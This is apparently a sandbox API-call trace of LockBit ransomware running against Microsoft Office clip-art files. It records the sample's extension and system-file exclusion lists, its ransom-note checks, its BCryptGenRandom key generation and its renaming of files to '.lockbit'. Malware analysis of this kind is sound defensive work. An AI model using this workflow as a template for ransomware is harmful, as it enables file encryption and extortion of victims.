free (_Block=0x1fa2ed8) [0157.308] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301052.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.308] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.308] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.309] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56726050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4a5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301418.WMF", cAlternateFileName="")) returned 1 [0157.309] lstrcmpiW (lpString1=".", lpString2="J0301418.WMF") returned -1 [0157.309] lstrcmpiW (lpString1="..", lpString2="J0301418.WMF") returned -1 [0157.309] PathFindExtensionW (pszPath="J0301418.WMF") returned=".WMF" [0157.309] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.309] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.310] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.310] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301418.WMF") returned 1 [0157.311] lstrcmpiW (lpString1="ntldr", lpString2="J0301418.WMF") returned 1 [0157.311] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301418.WMF") returned 1 [0157.311] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301418.WMF") returned -1 [0157.311] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301418.WMF") returned -1 [0157.311] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301418.WMF") returned 1 [0157.311] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301418.WMF") returned -1 [0157.311] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.311] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF") returned=".WMF" [0157.311] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.311] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.311] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.312] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.312] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF.lockbit") returned 72 [0157.312] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301418.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.314] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.314] malloc (_Size=0x40068) returned 0x3df0008 [0157.314] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19034) returned 1 [0157.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.315] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.315] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.315] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.316] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.316] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.316] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0157.323] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.323] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.324] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0xc0000008 [0157.324] free (_Block=0x1fa2ed8) [0157.324] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301418.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.324] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.324] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.324] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x66162910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0x4dfa, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0301432.WMF", cAlternateFileName="")) returned 1 [0157.324] lstrcmpiW (lpString1=".", lpString2="J0301432.WMF") returned -1 [0157.324] lstrcmpiW (lpString1="..", lpString2="J0301432.WMF") returned -1 [0157.324] PathFindExtensionW (pszPath="J0301432.WMF") returned=".WMF" [0157.324] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.324] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.325] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.325] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.326] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0301432.WMF") returned 1 [0157.326] lstrcmpiW (lpString1="ntldr", lpString2="J0301432.WMF") returned 1 [0157.326] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0301432.WMF") returned 1 [0157.326] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0301432.WMF") returned -1 [0157.326] lstrcmpiW (lpString1="autorun.inf", lpString2="J0301432.WMF") returned -1 [0157.327] lstrcmpiW (lpString1="thumbs.db", lpString2="J0301432.WMF") returned 1 [0157.327] lstrcmpiW (lpString1="iconcache.db", lpString2="J0301432.WMF") returned -1 [0157.327] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.327] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF") returned=".WMF" [0157.327] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.327] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0157.327] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0157.328] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0157.328] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF.lockbit") returned 72 [0157.328] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0301432.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0157.329] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0157.330] malloc (_Size=0x40068) returned 0x3df0008 [0157.330] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19962) returned 1 [0157.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.330] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.330] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0157.330] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0157.331] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0157.331] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0157.331] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0157.336] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0157.336] malloc (_Size=0xa6) returned 0x1fa2ed8 [0157.337] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0157.338] free (_Block=0x1fa2ed8) [0157.338] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0301432.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0157.338] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0157.338] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0157.338] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77652000, ftCreationTime.dwHighDateTime=0x1c7a765, ftLastAccessTime.dwLowDateTime=0x56726050, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x77652000, ftLastWriteTime.dwHighDateTime=0x1c7a765, nFileSizeHigh=0x0, nFileSizeLow=0xe20, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0304371.WMF", cAlternateFileName="")) returned 1 [0157.338] lstrcmpiW (lpString1=".", lpString2="J0304371.WMF") returned -1 [0157.338] lstrcmpiW (lpString1="..", lpString2="J0304371.WMF") returned -1 [0157.339] PathFindExtensionW (pszPath="J0304371.WMF") returned=".WMF" [0157.339] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0157.339] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0157.340] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0157.340] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0304371.WMF") returned 1 [0157.341] lstrcmpiW (lpString1="ntldr", lpString2="J0304371.WMF") returned 1 [0157.341] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0304371.WMF") returned 1 [0157.341] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0304371.WMF") returned -1 [0157.341] lstrcmpiW (lpString1="autorun.inf", lpString2="J0304371.WMF") returned -1 [0157.341] lstrcmpiW (lpString1="thumbs.db", lpString2="J0304371.WMF") returned 1 [0157.341] lstrcmpiW (lpString1="iconcache.db", lpString2="J0304371.WMF") returned -1 [0157.341] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0157.341] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0304371.WMF") returned=".WMF" [0157.341] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0157.341] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0157.341] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0157.342] lstrcmpiW (lpString1=".db3", 